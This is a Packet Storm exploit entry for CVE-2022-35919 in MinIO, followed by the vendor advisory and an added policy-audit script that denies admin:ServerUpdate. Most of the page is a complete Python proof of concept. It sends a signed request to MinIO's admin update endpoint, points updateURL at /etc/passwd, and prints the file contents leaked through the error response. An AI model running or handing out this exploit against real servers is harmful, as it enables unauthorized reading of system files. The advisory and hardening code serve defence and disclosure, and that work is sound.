Minio 2022-07-29T19-40-48Z Path Traversal

Minio version 2022-07-29T19-40-48Z suffers from a path traversal vulnerability.

Packet Storm
Tags: vulnerability, windows, js, git, auth
# Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal
# Date: 2023-09-02
# Exploit Author: Jenson Zhao
# Vendor Homepage: https://min.io/
# Software Link: https://github.com/minio/minio/
# Version: Up to (excluding) 2022-07-29T19-40-48Z
# Tested on: Windows 10
# CVE : CVE-2022-35919
# Required before execution: pip install minio,requests

import sys
import urllib.parse
import requests, json, re, datetime, argparse
from minio.credentials import Credentials
from minio.signer import sign_v4_s3


class MyMinio():
    secure = False

    def __init__(self, base_url, access_key, secret_key):
        # Admin credentials are required: the affected endpoint is only
        # reachable by users holding the admin:ServerUpdate permission.
        self.credits = Credentials(
            access_key=access_key,
            secret_key=secret_key
        )
        if base_url.startswith('http://') and base_url.endswith('/'):
            self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
        elif base_url.startswith('https://') and base_url.endswith('/'):
            self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
            self.secure = True
        else:
            # Without a usable base URL there is nothing to request; exit
            # instead of failing later with an AttributeError on self.url.
            print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n')
            sys.exit(1)

    def poc(self):
        datetimes = datetime.datetime.utcnow()
        datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')
        urls = urllib.parse.urlparse(self.url)
        # SigV4 signing of an empty-body POST; the SHA-256 below is the hash
        # of the empty string.
        headers = {
            'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
            'X-Amz-Date': datetime_str,
            'Host': urls.netloc,
        }
        headers = sign_v4_s3(
            method='POST',
            url=urls,
            region='',
            headers=headers,
            credentials=self.credits,
            content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
            date=datetimes,
        )
        if self.secure:
            response = requests.post(url=self.url, headers=headers, verify=False)
        else:
            response = requests.post(url=self.url, headers=headers)
        try:
            # A vulnerable server echoes the requested file inside the error
            # message; look for passwd-style records to confirm it.
            message = json.loads(response.text)['Message']
            pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)'
            matches = re.findall(pattern, message)
            if matches:
                print('There is CVE-2022-35919 problem with the url!')
                print('The contents of the /etc/passwd file are as follows:')
                for match in matches:
                    print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5],
                                                        match[6]))
            else:
                print('There is no CVE-2022-35919 problem with the url!')
                print('Here is the response message content:')
                print(message)
        except Exception as e:
            print(
                'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:')
            print(response.text)


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/")
    parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")
    parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")
    args = parser.parse_args()
    minio = MyMinio(args.url, args.accesskey, args.secretkey)
    minio.poc()

Related news

CVE-2022-35919: do not allow filesystem fallback in server download (#15429) · minio/minio@bc72e42

MinIO is a High Performance Object Storage released under GNU Affero General Public License v3.0. In affected versions, any 'admin' user authorized for `admin:ServerUpdate` can deliberately trigger an error whose response returns the content of the path requested. On any ordinary operating system this exposes the contents of arbitrary paths that are readable by the MinIO process. Users are advised to upgrade. Users unable to upgrade may disable the ServerUpdate API by denying the `admin:ServerUpdate` action for their admin users via IAM policies.
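The advisory's workaround is to deny `admin:ServerUpdate` to admin users. The following added example (not code from Packet Storm, the exploit author or the MinIO project) shows how to audit a set of admin policy documents for that action and how to append an explicit Deny where it is still reachable. It assumes the policy layout MinIO shares with AWS IAM (a `Version` plus a list of `Statement` entries with `Effect` and `Action`), that a wildcard such as `admin:*` grants every admin action, and that an explicit Deny overrides any Allow; the two policy documents are constructed for the example.

```python
import fnmatch
import json

# Constructed sample policies for the example (not taken from any deployment).
# The first is the common "full admin" grant; the second carries the
# workaround from the advisory: an explicit Deny of admin:ServerUpdate.
PERMISSIVE_ADMIN_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["admin:*"]},
        {"Effect": "Allow", "Action": ["s3:*"], "Resource": ["arn:aws:s3:::*"]},
    ],
})

HARDENED_ADMIN_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["admin:*"]},
        {"Effect": "Deny", "Action": ["admin:ServerUpdate"]},
        {"Effect": "Allow", "Action": ["s3:*"], "Resource": ["arn:aws:s3:::*"]},
    ],
})


def _as_list(value):
    # Policy fields may be a single string or a list; normalise to a list.
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def action_matches(pattern, action):
    # IAM-style action matching: case-insensitive, '*' is a wildcard.
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def action_allowed(policy_json, action):
    """Return True if `action` is effectively allowed by the policy document.

    Assumed evaluation order (as in IAM): an explicit Deny on a matching
    statement wins over any Allow, and an action no statement mentions is
    implicitly denied.
    """
    policy = json.loads(policy_json)
    allowed = False
    for stmt in _as_list(policy.get("Statement")):
        for pattern in _as_list(stmt.get("Action")):
            if not action_matches(pattern, action):
                continue
            if stmt.get("Effect") == "Deny":
                return False
            if stmt.get("Effect") == "Allow":
                allowed = True
    return allowed


def harden_policy(policy_json, action="admin:ServerUpdate"):
    """Return a copy of the policy with an explicit Deny for `action`,
    added only when the action is currently reachable."""
    policy = json.loads(policy_json)
    statements = _as_list(policy.get("Statement"))
    if action_allowed(policy_json, action):
        statements.append({"Effect": "Deny", "Action": [action]})
    policy["Statement"] = statements
    return json.dumps(policy)


def audit(policies):
    """Map policy name -> True when admin:ServerUpdate is still reachable."""
    return {name: action_allowed(doc, "admin:ServerUpdate")
            for name, doc in policies.items()}


if __name__ == "__main__":
    findings = audit({"full-admin": PERMISSIVE_ADMIN_POLICY,
                      "full-admin-no-update": HARDENED_ADMIN_POLICY})
    for name, exposed in findings.items():
        print(f"{name}: admin:ServerUpdate {'ALLOWED' if exposed else 'denied'}")
    print(harden_policy(PERMISSIVE_ADMIN_POLICY))
```

The audit treats any wildcard grant as reaching `admin:ServerUpdate`, which is why a blanket `admin:*` policy is flagged until the explicit Deny is present; the Deny only removes the update action, so other admin actions such as `admin:ServerInfo` keep working under the hardened document.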
